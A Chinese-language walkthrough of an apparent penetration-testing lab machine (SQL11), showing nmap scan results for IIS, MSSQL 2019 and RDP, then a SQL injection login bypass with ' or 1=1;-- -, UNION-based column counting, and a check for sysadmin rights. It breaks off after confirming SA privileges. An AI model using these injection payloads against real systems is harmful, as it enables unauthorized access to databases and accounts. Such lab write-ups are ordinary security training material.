命令:nmap -A -Pn 192.168.243.140

Nmap initial output

Nmap scan report for 192.168.243.140
Host is up (0.21s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
**80/tcp   open  http          Microsoft IIS httpd 10.0**
|_http-title: Music Inventory
| http-cookie-flags: 
|   /: 
|     ASPSESSIONIDASADDDCC: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
**1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM**
| ms-sql-ntlm-info: 
|   Target_Name: SQL11
|   NetBIOS_Domain_Name: SQL11
|   NetBIOS_Computer_Name: **SQL11**
|   DNS_Domain_Name: sql11
|   DNS_Computer_Name: sql11
|_  Product_Version: 10.0.17763
|_ssl-date: 2022-07-15T04:52:30+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-07-15T04:51:02
|_Not valid after:  2052-07-15T04:51:02
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: SQL11
|   NetBIOS_Domain_Name: SQL11
|   NetBIOS_Computer_Name: SQL11
|   DNS_Domain_Name: sql11
|   DNS_Computer_Name: **sql11**
|   Product_Version: 10.0.17763
|_  System_Time: 2022-07-15T04:52:23+00:00
| ssl-cert: Subject: commonName=sql11
| Not valid before: 2022-04-05T19:29:36
|_Not valid after:  2022-10-05T19:29:36
|_ssl-date: 2022-07-15T04:52:29+00:00; 0s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| ms-sql-info: 
|   192.168.243.140:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
-   Hop 1 is the same as for 192.168.243.141
2   204.78 ms 192.168.243.140

80端口开发,访问:

01.png

尝试登录绕过(注意是MSSQL),在Username处使用万能密码‘ or 1=1;-- -尝试绕过登录,发现绕过登录成功。

02.png

03.png

登录绕过之后,发现存在查询,尝试sql注入。

查看查询有几项:

首先,尝试' union select 1;-- -,出现500错误。

05.png

发现' union select 1,2;-- -显示正常。

04.png

这样,可以得出结论:表项有两项。

接着来查看当前用户权限。判断是否为SA:is_srvrolemember('sysadmin')

这里使用命令如下:

' union select is_srvrolemember('sysadmin'),2;-- -

06.png

可以确定用户权限为SA